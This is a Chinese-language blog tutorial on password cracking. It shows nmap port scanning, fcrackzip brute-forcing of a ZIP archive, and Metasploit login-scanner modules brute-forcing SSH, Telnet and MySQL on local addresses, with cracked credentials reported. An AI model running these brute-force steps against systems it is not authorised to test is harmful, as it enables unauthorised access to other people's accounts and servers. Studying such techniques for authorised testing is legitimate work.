密码自古以来就是人类保护自己的一种方式。从锁 🔒的发明到摩斯电码、直到现在的各种加密算法。密码已经成为当代人生活中不可缺少又非常重要的一种工具,更或者说是一种人们的生活方式。而破解密码也已经成为 大佬 和 小学生 共同交流的话题!


密码破解前期的准备
常见名词解释
名词 |
释意 |
字典 |
即一些密码的集合,格式一般为 txt |
暴力破解 |
一种破解方式,通过已知密码字典分别进行尝试,成功率和字典有关。 |
掩码破解 |
由于受到字典的限制无法破解成功,可用 猜测 的方式破解。如 ?a?a?a?a 代表 4 位 0~9 的密码(不同程序,表示方法可能不同。)但是对计算机的要求比较高 |
常见端口信息收集
端口 |
程序 |
21 |
FTP 端口 用于上传文件到服务器 |
22 |
SSH SFTP 端口,用于登录服务器执行命令 |
3306 |
mysql 端口 (远程服务器需要账号授权) |
3389 |
Windwos远程登录 端口 |
5800 |
VNC 端口相当于Windows的远程登录 |
判断端口是否开启
利用 nmap 即可查看目标端口是否开启
nmap -T4 -A 192.168.1.1/24
扫描局域网内所有设备开启的相关端口,当然我们也可以中 msfconsole nessus 等相关神器进行信息收集,但这里不再详讲!
如下图 这台 ASUS RT-N56U 设备开启了 22 80 等端口。

常见的破解方式
01压缩文件的暴力破解(zip rar )
使用fcrackzip破解zip压缩包
这是一款kali下字段的破解zip压缩包的工具。
使用如下:
破解ZIP加密文件
fcrackzip -b -l 6-6 -c 1 -p 000000 passwd.zip
-b 暴力破解
-c 1 限制密码是数字
-l 6-6 限制密码长度为6
-p 000000 初始化破解起点
-
如何使用字典破解呢
fcrackzip -D -p passwd passwd.zip
当然,也可以参考我前面写过的一篇文章
《利用python破解zip密码》
02破解ssh
我们可以利用 nmap msfconsole 等工具里面字典的模块进行破解。这里 以 msfconsole 为例:
use auxiliary/scanner/ssh/ssh_login
set PASS_FILE /root/zi.txt
set RHOSTS 192.168.123.1
set USERNAME admin
run
如下:密码和账号破解为 admin admin

03telnet破解
Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。
扫描目标是否开启相应端口
nmap -T4 -A 192.168.123.1 -p 23
结果如下:

利用msfconsole中的相应模块进行破解
use auxiliary/scanner/telnet/telnet_login
破解效果如下:

04 mysql破解
MySQL是一个关系型数据库管理系统,MySQL 是最流行的关系型数据库管理系统之一,在 WEB 应用方面,MySQL是最好的 RDBMS 应用软件之一。
使用模块
use auxiliary/scanner/mysql/mysql_login
效果如下
数据库 dede 的密码为 123456
远程登录测试

当然,我们利用其他的密码破解工具也是可以的,如hashcat john medusa 这些神器都可以完成密码的破解,每个工具都有各自的优势和缺点,这里我也不详细说明了。有兴趣的可以去论坛查找相关的帖子学习哦! |